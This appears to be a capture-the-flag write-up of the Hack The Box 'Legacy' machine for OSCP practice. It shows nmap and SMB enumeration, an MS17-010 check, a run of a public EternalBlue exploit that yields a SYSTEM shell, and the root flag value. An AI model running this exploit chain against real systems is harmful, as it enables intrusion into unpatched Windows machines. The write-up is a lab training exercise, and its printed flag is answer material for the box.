In this practice box from Hack The Box (HTB), we explore one of the machines from TJNull’s list, which is widely recognized as part of the essential preparation for the Offensive Security Certified Professional (OSCP) exam. TJNull’s curated list is designed to help individuals hone their penetration testing skills and get accustomed to the types of challenges they’ll face during the OSCP. This particular box reflects the practical, hands-on nature of the OSCP certification process, providing an excellent opportunity for learners to test and expand their knowledge in a controlled, realistic environment. Whether you’re a seasoned security professional or just starting, working through this box will be a valuable step in your OSCP preparation journey.
Nmap scan
╭─kali@kali ~/HTB/Legacy/results/10.10.10.4/scans
╰─$ cat _quick_tcp_nmap.txt
# Nmap 7.94 scan initiated Thu Oct 12 17:55:44 2023 as: nmap -vv --reason -Pn -T4 -sV -sC --version-all -A --osscan-guess -oN /home/kali/HTB/Legacy/results/10.10.10.4/scans/_quick_tcp_nmap.txt -oX /home/kali/HTB/Legacy/results/10.10.10.4/scans/xml/_quick_tcp_nmap.xml 10.10.10.4
Nmap scan report for 10.10.10.4
Host is up, received user-set (0.35s latency).
Scanned at 2023-10-12 17:55:51 EDT for 30s
Not shown: 997 closed tcp ports (conn-refused)
PORT STATE SERVICE REASON VERSION
135/tcp open msrpc syn-ack Microsoft Windows RPC
139/tcp open netbios-ssn syn-ack Microsoft Windows netbios-ssn
445/tcp open �'h�U syn-ack Windows XP microsoft-ds
Service Info: OSs: Windows, Windows XP; CPE: cpe:/o:microsoft:windows, cpe:/o:microsoft:windows_xp
Host script results:
|_smb2-time: Protocol negotiation failed (SMB2)
| smb-security-mode:
| account_used: guest
| authentication_level: user
| challenge_response: supported
|_ message_signing: disabled (dangerous, but default)
| smb-os-discovery:
| OS: Windows XP (Windows 2000 LAN Manager)
| OS CPE: cpe:/o:microsoft:windows_xp::-
| Computer name: legacy
| NetBIOS computer name: LEGACY\x00
| Workgroup: HTB\x00
|_ System time: 2023-10-18T02:53:50+03:00
| p2p-conficker:
| Checking for Conficker.C or higher...
| Check 1 (port 40600/tcp): CLEAN (Couldn't connect)
| Check 2 (port 44494/tcp): CLEAN (Couldn't connect)
| Check 3 (port 50902/udp): CLEAN (Failed to receive data)
| Check 4 (port 47842/udp): CLEAN (Failed to receive data)
|_ 0/4 checks are positive: Host is CLEAN or ports are blocked
| nbstat: NetBIOS name: LEGACY, NetBIOS user: <unknown>, NetBIOS MAC: 00:50:56:b9:4d:58 (VMware)
| Names:
| LEGACY<00> Flags: <unique><active>
| HTB<00> Flags: <group><active>
| LEGACY<20> Flags: <unique><active>
| HTB<1e> Flags: <group><active>
| HTB<1d> Flags: <unique><active>
| \x01\x02__MSBROWSE__\x02<01> Flags: <group><active>
| Statistics:
| 00:50:56:b9:4d:58:00:00:00:00:00:00:00:00:00:00:00
| 00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00
|_ 00:00:00:00:00:00:00:00:00:00:00:00:00:00
|_smb2-security-mode: Couldn't establish a SMBv2 connection.
|_clock-skew: mean: 5d00h27m39s, deviation: 2h07m15s, median: 4d22h57m40s
Read data files from: /usr/bin/../share/nmap
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Thu Oct 12 17:56:21 2023 -- 1 IP address (1 host up) scanned in 36.40 seconds
fingerprinting OS
╰─$ crackmapexec smb 10.10.10.4 -u '' -p ''
SMB 10.10.10.4 445 LEGACY [*] Windows 5.1 (name:LEGACY) (domain:legacy) (signing:False) (SMBv1:True)
SMB 10.10.10.4 445 LEGACY [+] legacy\:
╭─kali@kali ~/HTB/Legacy/results/10.10.10.4/scans
serachsploit
╰─$ searchsploit Microsoft Windows XP | grep -i smb
Microsoft - SMB Server Trans2 Zero Size Pool Alloc (MS10-054) | windows/dos/14607.py
Microsoft DNS RPC Service - 'extractQuotedChar()' Remote Overflow 'SMB' (MS07-029) (Metasploit) | windows/remote/16366.rb
Microsoft SMB Driver - Local Denial of Service | windows/dos/28001.c
Microsoft Windows - 'EternalRomance'/'EternalSynergy'/'EternalChampion' SMB Remote Code Execution (Metasploit) (MS17-010) | windows/remote/43970.rb
Microsoft Windows - 'SMB' Transaction Response Handling (MS05-011) | windows/dos/1065.c
Microsoft Windows - 'SMBGhost' Remote Code Execution | windows/remote/48537.py
Microsoft Windows - 'srv2.sys' SMB Code Execution (Python) (MS09-050) | windows/remote/40280.py
Microsoft Windows - 'srv2.sys' SMB Negotiate ProcessID Function Table Dereference (MS09-050) | windows/remote/14674.txt
Microsoft Windows - 'srv2.sys' SMB Negotiate ProcessID Function Table Dereference (MS09-050) (Metasploit) | windows/remote/16363.rb
Microsoft Windows - 'WRITE_ANDX' SMB Command Handling Kernel Denial of Service (Metasploit) | windows/dos/6463.rb
Microsoft Windows - LSASS SMB NTLM Exchange Null-Pointer Dereference (MS16-137) | windows/dos/40744.txt
Microsoft Windows - SMB Client-Side Bug (PoC) (MS10-006) | windows/dos/12258.py
Microsoft Windows - SMB Relay Code Execution (MS08-068) (Metasploit) | windows/remote/16360.rb
Microsoft Windows - SMB Remote Code Execution Scanner (MS17-010) (Metasploit) | windows/dos/41891.rb
Microsoft Windows - SMB2 Negotiate Protocol '0x72' Response Denial of Service | windows/dos/12524.py
Microsoft Windows - SmbRelay3 NTLM Replay (MS08-068) | windows/remote/7125.txt
Microsoft Windows 10 (1903/1909) - 'SMBGhost' SMB3.1.1 'SMB2_COMPRESSION_CAPABILITIES' Buffer Overflow (PoC) | windows/dos/48216.md
Microsoft Windows 10 (1903/1909) - 'SMBGhost' SMB3.1.1 'SMB2_COMPRESSION_CAPABILITIES' Local Privilege Escalation | windows/local/48267.txt
Microsoft Windows 10 - SMBv3 Tree Connect (PoC) | windows/dos/41222.py
Microsoft Windows 10.0.17134.648 - HTTP -> SMB NTLM Reflection Leads to Privilege Elevation | windows/local/47115.txt
Microsoft Windows 2000/XP - SMB Authentication Remote Overflow | windows/remote/20.txt
Microsoft Windows 2003 SP2 - 'ERRATICGOPHER' SMB Remote Code Execution | windows/remote/41929.py
Microsoft Windows 2003 SP2 - 'RRAS' SMB Remote Code Execution | windows/remote/44616.py
Microsoft Windows 7/2008 R2 - 'EternalBlue' SMB Remote Code Execution (MS17-010) | windows/remote/42031.py
Microsoft Windows 7/2008 R2 - SMB Client Trans2 Stack Overflow (MS10-020) (PoC) | windows/dos/12273.py
Microsoft Windows 7/8.1/2008 R2/2012 R2/2016 R2 - 'EternalBlue' SMB Remote Code Execution (MS17-010) | windows/remote/42315.py
Microsoft Windows 8.1/2012 R2 - SMBv3 Null Pointer Dereference Denial of Service | windows/dos/44189.py
Microsoft Windows 8/8.1/2012 R2 (x64) - 'EternalBlue' SMB Remote Code Execution (MS17-010) | windows_x86-64/remote/42030.py
Microsoft Windows 95/Windows for Workgroups - 'smbclient' Directory Traversal | windows/remote/20371.txt
Microsoft Windows NT 4.0 SP5 / Terminal Server 4.0 - 'Pass the Hash' with Modified SMB Client | windows/remote/19197.txt
Microsoft Windows Server 2008 R2 (x64) - 'SrvOs2FeaToNt' SMB Remote Code Execution (MS17-010) | windows_x86-64/remote/41987.py
Microsoft Windows SMB Server (v1/v2) - Mount Point Arbitrary Device Open Privilege Escalation | windows/dos/43517.txt
Microsoft Windows Vista/7 - SMB2.0 Negotiate Protocol Request Remote Blue Screen of Death (MS07-063) | windows/dos/9594.txt
Microsoft Windows XP/2000 - 'Mrxsmb.sys' Local Privilege Escalation (MS06-030) | windows/local/1911.c
Microsoft Windows XP/2000/NT 4.0 - Network Share Provider SMB Request Buffer Overflow (1) | windows/dos/21746.c
Microsoft Windows XP/2000/NT 4.0 - Network Share Provider SMB Request Buffer Overflow (2) | windows/dos/21747.txt
╭─kali@kali ~/HTB/Legacy/results/10.10.10.4/scans
Interest is
micrsoft Windows 7/2008 R2 - 'EternalBlue' SMB Remote Code Execution (MS17-010)```
checking if this is vulnerable
╭─kali@kali ~/HTB/Legacy/results/10.10.10.4/scans
╰─$ nmap -p445 --script smb-vuln-ms17-010 10.10.10.4 1 ↵
Starting Nmap 7.94 ( https://nmap.org ) at 2023-10-15 06:03 EDT
Nmap scan report for 10.10.10.4
Host is up (0.34s latency).
PORT STATE SERVICE
445/tcp open microsoft-ds
Host script results:
| smb-vuln-ms17-010:
| VULNERABLE:
| Remote Code Execution vulnerability in Microsoft SMBv1 servers (ms17-010)
| State: VULNERABLE
| IDs: CVE:CVE-2017-0143
| Risk factor: HIGH
| A critical remote code execution vulnerability exists in Microsoft SMBv1
| servers (ms17-010).
|
| Disclosure date: 2017-03-14
| References:
| https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0143
| https://blogs.technet.microsoft.com/msrc/2017/05/12/customer-guidance-for-wannacrypt-attacks/
|_ https://technet.microsoft.com/en-us/library/security/ms17-010.aspx
Nmap done: 1 IP address (1 host up) scanned in 10.56 seconds
╭─kali@kali ~/HTB/Legacy/results/10.10.10.4/scans
╰─$
getting the exploit from — https://github.com/3ndG4me/AutoBlue-MS17-010
running the exploit
╭─kali@kali ~/HTB/Legacy/AutoBlue-MS17-010 ‹master●›
╰─$ python eternal_checker.py 10.10.10.4
[*] Target OS: Windows 5.1
[!] The target is not patched
=== Testing named pipes ===
[+] Found pipe 'browser'
[*] Done
╭─kali@kali ~/HTB/Legacy/AutoBlue-MS17-010 ‹master●›
╰─$ python zzz_exploit.py 10.10.10.4
[*] Target OS: Windows 5.1
[+] Found pipe 'browser'
[+] Using named pipe: browser
Groom packets
attempt controlling next transaction on x86
success controlling one transaction
modify parameter count to 0xffffffff to be able to write backward
leak next transaction
CONNECTION: 0x86453b30
SESSION: 0xe2429ad8
FLINK: 0x7bd48
InData: 0x7ae28
MID: 0xa
TRANS1: 0x78b50
TRANS2: 0x7ac90
modify transaction struct for arbitrary read/write
[*] make this SMB session to be SYSTEM
[+] current TOKEN addr: 0xe23e91b0
userAndGroupCount: 0x3
userAndGroupsAddr: 0xe23e9250
[*] overwriting token UserAndGroups
[*] have fun with the system smb session!
[!] Dropping a semi-interactive shell (remember to escape special chars with ^)
[!] Executing interactive programs will hang shell!
C:\WINDOWS\system32>
root flag
C:\WINDOWS\system32>dir "C:\Documents and Settings"
Volume in drive C has no label.
Volume Serial Number is 54BF-723B
Directory of C:\Documents and Settings
16/03/2017 09:07 �� <DIR> .
16/03/2017 09:07 �� <DIR> ..
16/03/2017 09:07 �� <DIR> Administrator
16/03/2017 08:29 �� <DIR> All Users
16/03/2017 08:33 �� <DIR> john
0 File(s) 0 bytes
5 Dir(s) 6.352.752.640 bytes free
C:\WINDOWS\system32>dir "C:\Documents and Settings"\Administrator
Volume in drive C has no label.
Volume Serial Number is 54BF-723B
Directory of C:\Documents and Settings\Administrator
16/03/2017 09:07 �� <DIR> .
16/03/2017 09:07 �� <DIR> ..
16/03/2017 09:18 �� <DIR> Desktop
16/03/2017 09:07 �� <DIR> Favorites
16/03/2017 09:07 �� <DIR> My Documents
16/03/2017 08:20 �� <DIR> Start Menu
0 File(s) 0 bytes
6 Dir(s) 6.352.744.448 bytes free
C:\WINDOWS\system32>dir "C:\Documents and Settings"\Administrator\Desktop
Volume in drive C has no label.
Volume Serial Number is 54BF-723B
Directory of C:\Documents and Settings\Administrator\Desktop
16/03/2017 09:18 �� <DIR> .
16/03/2017 09:18 �� <DIR> ..
16/03/2017 09:18 �� 32 root.txt
1 File(s) 32 bytes
2 Dir(s) 6.352.744.448 bytes free
C:\WINDOWS\system32>type "C:\Documents and Settings"\Administrator\Desktop\root.txt
993442d258b0e0ec917cae9e695d5713
C:\WINDOWS\system32>